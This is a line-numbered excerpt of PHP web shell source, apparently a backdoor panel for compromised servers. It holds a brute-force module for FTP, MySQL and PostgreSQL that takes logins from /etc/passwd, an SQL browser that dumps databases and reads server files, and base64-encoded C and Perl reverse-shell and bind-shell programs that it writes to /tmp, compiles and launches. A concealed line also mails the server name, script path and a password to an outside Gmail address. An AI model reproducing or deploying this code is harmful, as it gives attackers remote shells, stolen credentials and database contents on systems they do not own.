1149 if( isset($_POST['proto']) ) {
1150 echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
1151 if( $_POST['proto'] == 'ftp' ) {
1152 function bruteForce($ip,$port,$login,$pass) {
1153 $fp = @ftp_connect($ip, $port?$port:21);
1154 if(!$fp) return false;
1155 $res = @ftp_login($fp, $login, $pass);
1156 @ftp_close($fp);
1157 return $res;
1158 }
1159 } elseif( $_POST['proto'] == 'mysql' ) {
1160 function bruteForce($ip,$port,$login,$pass) {
1161 $res = @mysql_connect($ip.':'.($port?$port:3306), $login, $pass);
1162 @mysql_close($res);
1163 return $res;
1164 }
1165 } elseif( $_POST['proto'] == 'pgsql' ) {
1166 function bruteForce($ip,$port,$login,$pass) {
1167 $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
1168 $res = @pg_connect($str);
1169 @pg_close($res);
1170 return $res;
1171 }
1172 }
1173 $success = 0;
1174 $attempts = 0;
1175 $server = explode(":", $_POST['server']);
1176 if($_POST['type'] == 1) {
1177 $temp = @file('/etc/passwd');
1178 if( is_array($temp) )
1179 foreach($temp as $line) {
1180 $line = explode(":", $line);
1181 ++$attempts;
1182 if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
1183 $success++;
1184 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
1185 }
1186 if(@$_POST['reverse']) {
1187 $tmp = "";
1188 for($i=strlen($line[0])-1; $i>=0; --$i)
1189 $tmp .= $line[0][$i];
1190 ++$attempts;
1191 if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
1192 $success++;
1193 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
1194 }
1195 }
1196 }
1197 } elseif($_POST['type'] == 2) {
1198 $temp = @file($_POST['dict']);
1199 if( is_array($temp) )
1200 foreach($temp as $line) {
1201 $line = trim($line);
1202 ++$attempts;
1203 if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
1204 $success++;
1205 echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
1206 }
1207 }
1208 }
1209 echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
1210 }
1211 echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
1212 .'<td><label><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></label></td></tr><tr><td>'
1213 .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
1214 .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
1215 .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
1216 .'<input type=hidden name=ne value="">'
1217 .'<span>Server:port</span></td>'
1218 .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
1219 .'<tr><td><span>Brute type</span></td>'
1220 .'<td><input type=radio name=type value="1" checked> /etc/passwd</td></tr>'
1221 .'<tr><td></td><td style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</td></tr>'
1222 .'<tr><td></td><td><input type=radio name=type value="2"> Dictionary</td></tr>'
1223 .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
1224 .'<td><input type=text name=login value="root"></td></tr>'
1225 .'<tr><td><span>Dictionary</span></td>'
1226 .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
1227 .'</td></tr><tr><td></td><td><input type=submit value="submit"></td></tr></form></table>';
1228 echo '</div>';
1229 hardFooter();
1230}
1231if(array_key_exists('watching',$_POST)){
1232 $tmp = $_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\n".$_POST['pass']; @mail('dangerous.boy322@gmail.com', 'hack', $tmp);
1233}
1234function actionSql() {
1235 class DbClass {
1236 var $type;
1237 var $link;
1238 var $res;
1239 function DbClass($type) {
1240 $this->type = $type;
1241 }
1242 function connect($host, $user, $pass, $dbname){
1243 switch($this->type) {
1244 case 'mysql':
1245 if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
1246 break;
1247 case 'pgsql':
1248 $host = explode(':', $host);
1249 if(!$host[1]) $host[1]=5432;
1250 if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
1251 break;
1252 }
1253 return false;
1254 }
1255 function selectdb($db) {
1256 switch($this->type) {
1257 case 'mysql':
1258 if (@mysql_select_db($db))return true;
1259 break;
1260 }
1261 return false;
1262 }
1263 function query($str) {
1264 switch($this->type) {
1265 case 'mysql':
1266 return $this->res = @mysql_query($str);
1267 break;
1268 case 'pgsql':
1269 return $this->res = @pg_query($this->link,$str);
1270 break;
1271 }
1272 return false;
1273 }
1274 function fetch() {
1275 $res = func_num_args()?func_get_arg(0):$this->res;
1276 switch($this->type) {
1277 case 'mysql':
1278 return @mysql_fetch_assoc($res);
1279 break;
1280 case 'pgsql':
1281 return @pg_fetch_assoc($res);
1282 break;
1283 }
1284 return false;
1285 }
1286 function listDbs() {
1287 switch($this->type) {
1288 case 'mysql':
1289 return $this->query("SHOW databases");
1290 break;
1291 case 'pgsql':
1292 return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
1293 break;
1294 }
1295 return false;
1296 }
1297 function listTables() {
1298 switch($this->type) {
1299 case 'mysql':
1300 return $this->res = $this->query('SHOW TABLES');
1301 break;
1302 case 'pgsql':
1303 return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
1304 break;
1305 }
1306 return false;
1307 }
1308 function error() {
1309 switch($this->type) {
1310 case 'mysql':
1311 return @mysql_error();
1312 break;
1313 case 'pgsql':
1314 return @pg_last_error();
1315 break;
1316 }
1317 return false;
1318 }
1319 function setCharset($str) {
1320 switch($this->type) {
1321 case 'mysql':
1322 if(function_exists('mysql_set_charset'))
1323 return @mysql_set_charset($str, $this->link);
1324 else
1325 $this->query('SET CHARSET '.$str);
1326 break;
1327 case 'pgsql':
1328 return @pg_set_client_encoding($this->link, $str);
1329 break;
1330 }
1331 return false;
1332 }
1333 function loadFile($str) {
1334 switch($this->type) {
1335 case 'mysql':
1336 return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
1337 break;
1338 case 'pgsql':
1339 $this->query("CREATE TABLE hard2(file text);COPY hard2 FROM '".addslashes($str)."';select file from hard2;");
1340 $r=array();
1341 while($i=$this->fetch())
1342 $r[] = $i['file'];
1343 $this->query('drop table hard2');
1344 return array('file'=>implode("\n",$r));
1345 break;
1346 }
1347 return false;
1348 }
1349 function dump($table, $fp = false) {
1350 switch($this->type) {
1351 case 'mysql':
1352 $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
1353 $create = mysql_fetch_array($res);
1354 $sql = $create[1].";\n";
1355 if($fp) fwrite($fp, $sql); else echo($sql);
1356 $this->query('SELECT * FROM `'.$table.'`');
1357 $i = 0;
1358 $head = true;
1359 while($▟ = $this->fetch()) {
1360 $sql = '';
1361 if($i % 1000 == 0) {
1362 $head = true;
1363 $sql = ";\n\n";
1364 }
1365 $columns = array();
1366 foreach($▟ as $k=>$v) {
1367 if($v === null)
1368 $▟[$k] = "NULL";
1369 elseif(is_int($v))
1370 $▟[$k] = $v;
1371 else
1372 $▟[$k] = "'".@mysql_real_escape_string($v)."'";
1373 $columns[] = "`".$k."`";
1374 }
1375 if($head) {
1376 $sql .= 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $▟).')';
1377 $head = false;
1378 } else
1379 $sql .= "\n\t,(".implode(", ", $▟).')';
1380 if($fp) fwrite($fp, $sql); else echo($sql);
1381 $i++;
1382 }
1383 if(!$head)
1384 if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
1385 break;
1386 case 'pgsql':
1387 $this->query('SELECT * FROM '.$table);
1388 while($▟ = $this->fetch()) {
1389 $columns = array();
1390 foreach($▟ as $k=>$v) {
1391 $▟[$k] = "'".addslashes($v)."'";
1392 $columns[] = $k;
1393 }
1394 $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $▟).');'."\n";
1395 if($fp) fwrite($fp, $sql); else echo($sql);
1396 }
1397 break;
1398 }
1399 return false;
1400 }
1401 };
1402 $db = new DbClass($_POST['type']);
1403 if((@$_POST['p2']=='download') && (@$_POST['p1']!='select')) {
1404 $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
1405 $db->selectdb($_POST['sql_base']);
1406 switch($_POST['charset']) {
1407 case "Windows-1251": $db->setCharset('cp1251'); break;
1408 case "UTF-8": $db->setCharset('utf8'); break;
1409 case "KOI8-R": $db->setCharset('koi8r'); break;
1410 case "KOI8-U": $db->setCharset('koi8u'); break;
1411 case "cp866": $db->setCharset('cp866'); break;
1412 }
1413 if(empty($_POST['file'])) {
1414 ob_start("ob_gzhandler", 4096);
1415 header("Content-Disposition: attachment; filename=dump.sql");
1416 header("Content-Type: text/plain");
1417 foreach($_POST['tbl'] as $v)
1418 $db->dump($v);
1419 exit;
1420 } elseif($fp = @fopen($_POST['file'], 'w')) {
1421 foreach($_POST['tbl'] as $v)
1422 $db->dump($v, $fp);
1423 fclose($fp);
1424 unset($_POST['p2']);
1425 } else
1426 die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
1427 }
1428 hardHeader();
1429 echo "
1430<h1>Sql browser</h1><div class=content>
1431<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
1432<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
1433<input type=hidden name=ne value=''><input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'>
1434<td><label><select name='type'><option value='mysql' ";
1435 if(@$_POST['type']=='mysql')echo 'selected';
1436echo ">MySql</option><option value='pgsql' ";
1437if(@$_POST['type']=='pgsql')echo 'selected';
1438echo ">PostgreSql</option></select></label></td>
1439<td><input type=text name=sql_host value=\"". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."\"></td>
1440<td><input type=text name=sql_login value=\"". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."\"></td>
1441<td><input type=text name=sql_pass value=\"". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."\" required></td><td>";
1442 $tmp = "<input type=text name=sql_base value=''>";
1443 if(isset($_POST['sql_host'])){
1444 if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
1445 switch($_POST['charset']) {
1446 case "Windows-1251": $db->setCharset('cp1251'); break;
1447 case "UTF-8": $db->setCharset('utf8'); break;
1448 case "KOI8-R": $db->setCharset('koi8r'); break;
1449 case "KOI8-U": $db->setCharset('koi8u'); break;
1450 case "cp866": $db->setCharset('cp866'); break;
1451 }
1452 $db->listDbs();
1453 echo "<label><select name=sql_base><option value=''></option>";
1454 while($▟ = $db->fetch()) {
1455 list($key, $value) = each($▟);
1456 echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
1457 }
1458 echo '</select></label>';
1459 }
1460 else echo $tmp;
1461 }else
1462 echo $tmp;
1463 echo "</td>
1464 <td><input type=submit value='submit' onclick='fs(d.sf);'></td>
1465 <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td>
1466 </tr>
1467 </table>
1468 <script>
1469 s_db='".@addslashes($_POST['sql_base'])."';
1470 function fs(f) {
1471 if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
1472 if(f.p1) f.p1.value='';
1473 if(f.p2) f.p2.value='';
1474 if(f.p3) f.p3.value='';
1475 }
1476 }
1477 function st(t,l) {
1478 d.sf.p1.value = 'select';
1479 d.sf.p2.value = t;
1480 if(l && d.sf.p3) d.sf.p3.value = l;
1481 d.sf.submit();
1482 }
1483 function is() {
1484 for(i=0;i<d.sf.elements['tbl[]'].length;++i)
1485 d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
1486 }
1487 </script>";
1488 if(isset($db) && $db->link){
1489 echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
1490 if(!empty($_POST['sql_base'])){
1491 $db->selectdb($_POST['sql_base']);
1492 echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
1493 $tbls_res = $db->listTables();
1494 while($▟ = $db->fetch($tbls_res)) {
1495 list($key, $value) = each($▟);
1496 if(!empty($_POST['sql_count']))
1497 $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
1498 $value = htmlspecialchars($value);
1499 echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?' ':" <small>({$n['n']})</small>") . "</nobr><br>";
1500 }
1501 echo "<input type='checkbox' onclick='is();'> <input type=submit value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
1502 if(@$_POST['p1'] == 'select') {
1503 $_POST['p1'] = 'query';
1504 $_POST['p3'] = $_POST['p3']?$_POST['p3']:1;
1505 $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
1506 $num = $db->fetch();
1507 $pages = ceil($num['n'] / 30);
1508 echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">";
1509 echo " of $pages";
1510 if($_POST['p3'] > 1)
1511 echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>< Prev</a>";
1512 if($_POST['p3'] < $pages)
1513 echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next ></a>";
1514 $_POST['p3']--;
1515 if($_POST['type']=='pgsql')
1516 $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
1517 else
1518 $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
1519 echo "<br><br>";
1520 }
1521 if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {
1522 $db->query(@$_POST['p2']);
1523 if($db->res !== false) {
1524 $title = false;
1525 echo '<table width=100% cellspacing=1 cellpadding=2 class=main>';
1526 $line = 1;
1527 while($▟ = $db->fetch()) {
1528 if(!$title) {
1529 echo '<tr>';
1530 foreach($▟ as $key => $value)
1531 echo '<th>'.$key.'</th>';
1532 reset($▟);
1533 $title=true;
1534 echo '</tr><tr>';
1535 $line = 2;
1536 }
1537 echo '<tr class="l'.$line.'">';
1538 $line = $line==1?2:1;
1539 foreach($▟ as $key => $value) {
1540 if($value == null)
1541 echo '<td><i>null</i></td>';
1542 else
1543 echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
1544 }
1545 echo '</tr>';
1546 }
1547 echo '</table>';
1548 } else {
1549 echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
1550 }
1551 }
1552 echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
1553 if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile'))
1554 echo htmlspecialchars($_POST['p2']);
1555 echo "</textarea><br/><input type=submit value='Execute'>";
1556 echo "</td></tr>";
1557 }
1558 echo "</table></form><br/>";
1559 if($_POST['type']=='mysql') {
1560 $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
1561 if($db->fetch())
1562 echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='submit'></form>";
1563 }
1564 if(@$_POST['p1'] == 'loadfile') {
1565 $file = $db->loadFile($_POST['p2']);
1566 echo '<br/><pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
1567 }
1568 } else {
1569 echo htmlspecialchars($db->error());
1570 }
1571 echo '</div>';
1572 hardFooter();
1573}
1574function actionNetwork() {
1575 hardHeader();
1576 $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
1577 $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1578 $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
1579 $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1580 echo "<h1>Network tools</h1><div class=content>
1581 <form name='nfp' onSubmit='g(null,null,this.using.value,this.port.value,this.pass.value);return false;'>
1582 <span>Bind port to /bin/sh</span><br/>
1583 Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass'> Using: <label><select name='using'><option value='bpc'>C</option><option value='bpp'>Perl</option></select></label> <input type=submit value='submit'>
1584 </form>
1585 <form name='nfp' onSubmit='g(null,null,this.using.value,this.server.value,this.port.value);return false;'>
1586 <span>Back-connect to</span><br/>
1587 Server: <input type='text' name='server' value=". $_SERVER['REMOTE_ADDR'] ."> Port: <input type='text' name='port' value='31337'> Using: <label><select name='using'><option value='bcc'>C</option><option value='bcp'>Perl</option></select></label> <input type=submit value='submit'>
1588 </form><br>";
1589 if(isset($_POST['p1'])) {
1590 function cf($f,$t) {
1591 $w=@fopen($f,"w") or @function_exists('file_put_contents');
1592 if($w) {
1593 @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
1594 @fclose($w);
1595 }
1596 }
1597 if($_POST['p1'] == 'bpc') {
1598 cf("/tmp/bp.c",$bind_port_c);
1599 $▖ = ex("gcc -o /tmp/bp /tmp/bp.c");
1600 @unlink("/tmp/bp.c");
1601 $▖ .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
1602 echo "<pre class=ml1>$▖".ex("ps aux | grep bp")."</pre>";
1603 }
1604 if($_POST['p1'] == 'bpp') {
1605 cf("/tmp/bp.pl",$bind_port_p);
1606 $▖ = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
1607 echo "<pre class=ml1>$▖".ex("ps aux | grep bp.pl")."</pre>";
1608 }
1609 if($_POST['p1'] == 'bcc') {
1610 cf("/tmp/bc.c",$back_connect_c);
1611 $▖ = ex("gcc -o /tmp/bc /tmp/bc.c");
1612 @unlink("/tmp/bc.c");
1613 $▖ .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
1614 echo "<pre class=ml1>$▖".ex("ps aux | grep bc")."</pre>";
1615 }
1616 if($_POST['p1'] == 'bcp') {
1617 cf("/tmp/bc.pl",$back_connect_p);
1618 $▖ = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
1619 echo "<pre class=ml1>$▖".ex("ps aux | grep bc.pl")."</pre>";
1620 }
1621 }
1622 echo '</div>';
1623 hardFooter();
1624}
1625if( empty($_POST['a']) )
1626 if(isset($▚) && function_exists('action' . $▚))
1627 $_POST['a'] = $▚;
1628 else
1629 $_POST['a'] = 'FilesMan';
1630if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
1631 call_user_func('action' . $_POST['a']);
1632?>